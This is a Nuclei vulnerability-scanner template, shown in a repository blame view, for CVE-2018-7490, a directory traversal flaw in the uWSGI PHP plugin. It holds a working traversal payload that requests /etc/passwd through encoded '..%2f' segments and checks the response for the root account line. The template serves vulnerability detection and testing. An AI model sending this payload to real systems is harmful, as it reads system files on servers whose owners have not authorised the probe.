nuclei-templates/cves/2018/CVE-2018-7490.yaml

21 lines
389 B
YAML
Raw Normal View History

2021-01-02 05:00:39 +00:00
id: CVE-2018-7490
info:
name: uWSGI PHP Plugin Directory Traversal
author: madrobot
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
matchers-condition: and
matchers:
- type: status
status:
2020-05-25 07:49:06 +00:00
- 200
- type: regex
regex:
2020-05-25 07:49:06 +00:00
- "root:[x*]:0:0:"
part: body